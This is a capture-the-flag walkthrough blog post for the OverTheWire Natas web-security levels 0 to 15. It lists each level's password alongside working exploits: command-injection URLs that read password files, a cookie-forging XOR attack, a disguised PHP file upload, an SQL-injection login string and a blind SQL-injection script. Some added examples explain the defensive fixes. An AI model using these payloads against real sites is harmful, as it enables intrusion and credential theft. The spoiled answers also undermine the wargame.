If you would like to read our older blogs, you are welcome: I4INFO
Yesterday I spent an hour or so on Natas; the site will be very familiar to you. It is the place where I first started learning Linux commands, and it is run by the same people who run Bandit on OverTheWire. I actually came to know of it through wechall.net, which was also new to me :) But I can assure you that if you want to start with web exploitation from a CTF point of view, http://natas.natas.labs.overthewire.org is a very good option.
Natas 00
See the source code.
pass:gtVrDuiDfck831PqWsLEZy5gyDz1clto
Natas 01
Open the developer tools with F12 and read the page source there.
pass:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
Natas 02
Browse to the files directory and read the user list there.
pass:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
Natas 03
Open robots.txt; it lists a directory containing the file that holds the password for the next level.
pass:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
Natas 04
Use Burp Suite to change the Referer header to:
Referer: http://natas5.natas.labs.overthewire.org/
pass:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Natas 05
Change the loggedin cookie from 0 to 1 using EditThisCookie or Firebug.
pass:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Natas 06
The page source shows the include file that holds the secret; fetch it directly to read the secret. Then send a POST request with the secret and the submit field. Write a script or use Postman in Chrome.
pass:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Natas 07
Local file inclusion: the page parameter is passed to include(), so point it at the password file for the next level.
pass:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Natas 08
Exploit
pass:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
Natas 09
Exploit:
http://natas9.natas.labs.overthewire.org/?needle[]=ls&needle=;cat%20/etc/natas_webpass/natas10
Pass:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Natas 10
There are two ways to solve this level. One is to go back to the natas9 approach and enter ".* /etc/natas_webpass/natas11" as the needle: the needle is pasted straight into the grep command line, so the password file becomes an extra file operand and grep prints every line of it.
The other uses a line feed: only ; | and & are filtered, so a %0a ends the grep command and whatever follows runs as a second command (%20 is the space). The exploit looks like this:
http://natas10.natas.labs.overthewire.org/?needle[]=.*%20/etc/natas_webpass/natas11&needle=%0acat%20.*%20/etc/natas_webpass/natas11
pass:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
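To make the natas9/natas10 pattern concrete, here is an added Python example (not the author's code and not from the Natas levels themselves). It models the level's passthru("grep -i $key dictionary.txt") with subprocess.run(shell=True), applies natas10's blacklist of ; | and &, and contrasts it with a hardened version that passes the needle as a single argv element without a shell. The webroot, dictionary.txt and secret.txt are constructed in a temporary directory and stand in for the real files; it needs a POSIX shell and grep.

```python
import os
import re
import subprocess
import tempfile

# Constructed stand-ins for the level's dictionary.txt and /etc/natas_webpass/natas11.
SECRET = "S3cr3tP4ss"
DICTIONARY = "apple\nbanana\ncherry\n"


def make_webroot():
    """Create a throwaway directory holding dictionary.txt and secret.txt."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "dictionary.txt"), "w") as f:
        f.write(DICTIONARY)
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write(SECRET + "\n")
    return root


def natas10_filter_allows(needle):
    """natas10's blacklist: the needle is rejected if it contains ; | or &.
    Spaces, newlines and shell globs pass straight through."""
    return re.search(r"[;|&]", needle) is None


def vulnerable_search(needle, webroot):
    """Models passthru("grep -i $key dictionary.txt"): the needle is pasted into
    a shell command line, so a space turns the rest into extra grep operands and
    a newline starts a second command. (The shell may also glob-expand `.*` to
    `.` and `..`; grep then warns about directories but still dumps secret.txt.)"""
    proc = subprocess.run("grep -i " + needle + " dictionary.txt",
                          shell=True, cwd=webroot, capture_output=True, text=True)
    return proc.stdout


def hardened_search(needle, webroot):
    """No shell: the needle is one argv element, and `--` stops grep from
    reading it as an option. It can only ever be a regex over dictionary.txt."""
    proc = subprocess.run(["grep", "-i", "--", needle, "dictionary.txt"],
                          cwd=webroot, capture_output=True, text=True)
    return proc.stdout


# The three payload styles used on natas9 / natas10.
PAYLOADS = {
    "natas9 semicolon": ";cat secret.txt",      # blocked by the natas10 filter
    "natas10 extra operand": ".* secret.txt",   # passes: grep reads secret.txt too
    "natas10 newline": "\ncat secret.txt",      # passes: newline ends the grep command
}

if __name__ == "__main__":
    root = make_webroot()
    for name, needle in PAYLOADS.items():
        allowed = natas10_filter_allows(needle)
        leaked = allowed and SECRET in vulnerable_search(needle, root)
        print(f"{name:22} filter allows: {allowed!s:5} leaks secret: {leaked}")
    print("hardened search with '.* secret.txt':", repr(hardened_search(".* secret.txt", root)))
```

The blacklist fails because it enumerates shell metacharacters instead of removing the shell; the hardened form removes the shell, so the only thing the user controls is the regular expression grep is asked to match.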
Natas 11
Getting the key
The level XORs the JSON of the data array with a secret repeating key and base64-encodes it into the data cookie. Since we know the default plaintext, XORing it with the decoded cookie gives the key back (the output repeats "qw8J").
<?php
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
$cookie = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D";
function xor_encrypt($in,$key) {
    $text = $in;
    $outText = '';
    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }
    return $outText;
}
// The cookie value is URL-encoded (%3D), so decode that before base64.
// Known plaintext XOR ciphertext = the key stream that was used.
$key = xor_encrypt(json_encode($defaultdata), base64_decode(urldecode($cookie)));
echo $key;
echo "\n";
?>
Getting the cookie
The level prints the password when $data["showpassword"] == "yes" (case-sensitive), so re-encrypt the modified array with the recovered key:
<?php
$defaultdata = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
    $key = 'qw8J';  // recovered above
    $text = $in;
    $outText = '';
    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }
    return $outText;
}
$newcookie = base64_encode(xor_encrypt(json_encode($defaultdata)));
echo " \n ------------------------------------\n";
echo " \n New cookie \n";
echo $newcookie;
echo " \n ------------------------------------\n";
?>
Set the data cookie to the new value and reload the page.
pass: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
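The same known-plaintext attack as an added Python example (not the author's PHP and not the level's own code). It goes a little beyond the PHP above: rather than eyeballing the repeating "qw8J" in the output, it recovers the full key stream, finds its shortest period, forges a cookie with showpassword set to "yes", and checks that the server-side decode would accept it. The cookie value and default data are the ones shown above; note that PHP's non-strict base64_decode happens to tolerate the %3D, but Python's does not, so the value is URL-decoded first.

```python
import base64
import json
from urllib.parse import quote, unquote

# Values taken from the level as shown above.
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}
COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D"


def php_json(data):
    """Byte-for-byte what PHP's json_encode() emits for this array:
    no spaces, keys in insertion order."""
    return json.dumps(data, separators=(",", ":")).encode()


def xor(data, key):
    """Repeating-key XOR, the same loop as the level's xor_encrypt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def cookie_bytes(cookie):
    """URL-decode (%3D -> '=') and then base64-decode the cookie value."""
    return base64.b64decode(unquote(cookie))


def keystream(cookie, known_data):
    """Known-plaintext attack: ciphertext XOR plaintext gives the key byte
    actually used at every position."""
    ct = cookie_bytes(cookie)
    pt = php_json(known_data)
    if len(ct) != len(pt):
        raise ValueError("cookie and known plaintext differ in length")
    return bytes(c ^ p for c, p in zip(ct, pt))


def shortest_period(stream):
    """Smallest p such that stream[i] == stream[i % p] for every i."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def recover_key(cookie, known_data):
    ks = keystream(cookie, known_data)
    return ks[: shortest_period(ks)]


def forge_cookie(key, data):
    """Re-encrypt attacker-chosen data exactly as the server would, URL-encoded
    like the original cookie."""
    return quote(base64.b64encode(xor(php_json(data), key)).decode(), safe="")


def decode_cookie(cookie, key):
    """What the server does on the way in: decode, XOR, parse JSON."""
    return json.loads(xor(cookie_bytes(cookie), key))


if __name__ == "__main__":
    key = recover_key(COOKIE, DEFAULT_DATA)
    print("recovered key:", key)
    forged = forge_cookie(key, {"showpassword": "yes", "bgcolor": "#ffffff"})
    print("forged data cookie:", forged)
    print("server decodes it as:", decode_cookie(forged, key))
```

The design flaw this exploits is not the short key but the construction: a stream cipher with no integrity check lets anyone who knows (or can guess) one plaintext recover the key stream and forge any value of the same or shorter length. A MAC over the cookie, or a server-side session, closes it.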
Natas 12
Upload a file, intercept the request in Burp and change the file name in the request so that it ends in .php.
pass: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
Natas 13
exif_imagetype() reads the first bytes of the uploaded file and compares them with the known image signatures. If the file starts with the JPEG signature the check passes no matter what follows, so prefixing the PHP script with these four bytes is enough to get past it:
\xFF\xD8\xFF\xE8
pass:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
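The point of natas13 is that a signature check is not image validation. The added Python example below (not the author's code and not from the level) mimics the JPEG test exif_imagetype() performs (the first three bytes FF D8 FF), builds the page's trick file, and then shows why a stricter check that walks the JPEG marker segments is also not a fix: the script survives inside a COM segment of an otherwise well-formed JPEG. The PHP payload and the minimal JPEG are constructed for the example.

```python
import struct

# exif_imagetype() only compares leading bytes against known signatures;
# for JPEG that is SOI (FF D8) followed by another marker byte (FF).
JPEG_SIGNATURE = b"\xFF\xD8\xFF"

# Constructed PHP payload, the kind of file uploaded to natas13 with a .php name.
PAYLOAD = b"<?php echo 'x'; ?>"

# A minimal but structurally valid JPEG: SOI, one 16-byte JFIF APP0 segment, EOI.
MINIMAL_JPEG = (
    b"\xFF\xD8"
    + b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xFF\xD9"
)


def passes_signature_check(data):
    """Mimics exif_imagetype()'s JPEG test: a prefix match and nothing more."""
    return data.startswith(JPEG_SIGNATURE)


def naive_polyglot(payload):
    """The page's trick: four JPEG bytes glued in front of the script."""
    return b"\xFF\xD8\xFF\xE8" + payload


def com_segment_polyglot(payload):
    """Hide the payload in a JPEG COM (FF FE) segment so the file is also a
    well-formed JPEG; the length field counts itself plus the payload."""
    com = b"\xFF\xFE" + struct.pack(">H", len(payload) + 2) + payload
    return b"\xFF\xD8" + com + MINIMAL_JPEG[2:]


def walks_as_jpeg(data):
    """Stricter check: walk the marker segments from SOI to EOI and require
    every length field to stay inside the file. Stops at SOS (FF DA), where
    entropy-coded data follows, and then only requires a trailing EOI."""
    if not data.startswith(b"\xFF\xD8"):
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD9:                                   # EOI
            return True
        if marker == 0xDA:                                   # SOS
            return data.endswith(b"\xFF\xD9")
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:         # standalone markers
            pos += 2
            continue
        if pos + 4 > len(data):
            return False
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if seg_len < 2 or pos + 2 + seg_len > len(data):
            return False
        pos += 2 + seg_len
    return False


if __name__ == "__main__":
    for name, blob in [("naive polyglot", naive_polyglot(PAYLOAD)),
                       ("COM-segment polyglot", com_segment_polyglot(PAYLOAD)),
                       ("minimal jpeg", MINIMAL_JPEG)]:
        print(f"{name:22} signature: {passes_signature_check(blob)!s:5} "
              f"marker walk: {walks_as_jpeg(blob)}")
```

The naive file fails the marker walk (its "length" field is the bytes "<?"), but the COM variant passes both checks and still carries the script byte-for-byte. Whatever the content check, the defence for an upload feature is to never let the uploaded bytes be executed: the server picks the stored extension, and the upload directory is not served through the PHP handler.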
Natas 14
The login form is vulnerable to SQL injection; log in with:
username = " or "1"="1
password = " or "1"="1
pass:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
Natas 15
This level only tells you whether a user exists, so the password has to be pulled out one character at a time with a boolean-based blind injection. The script below asks, for each position, whether the ASCII code of that character equals a candidate value and keeps the candidate when the page says "This user exists".
#!/usr/bin/env python
__author__ = "hrj"
import re
import requests

URL = 'http://natas15.natas.labs.overthewire.org/'
AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
password = ''

print("------------------------------------------------------------------------")
print(" Have patience, we will bring you the result ")
print("------------------------------------------------------------------------")

# To find the length of the password (left commented out; the loop below assumes 32)
'''
for i in range(1, 50):
    r = requests.get(URL + '?username=natas16" AND (length(password)) ="' + str(i), auth=AUTH)
    if re.findall("exists", r.text):
        print("Length: " + str(i))
        break
'''

# To find the password: one request per (position, candidate byte).
# ascii() is used because a plain string comparison in MySQL is case-insensitive.
for j in range(1, 33):
    for k in range(20, 123):
        r = requests.get(URL + '?username=natas16" AND ascii(substr((password),' + str(j) + ',1)) = "' + str(k), auth=AUTH)
        if re.findall("exists", r.text):
            password += chr(k)
            print("Guess Pass = " + password)
            break
print("Last Result : " + password)
Wait for the next blog, will be soon back!
Thank you for reading the blog!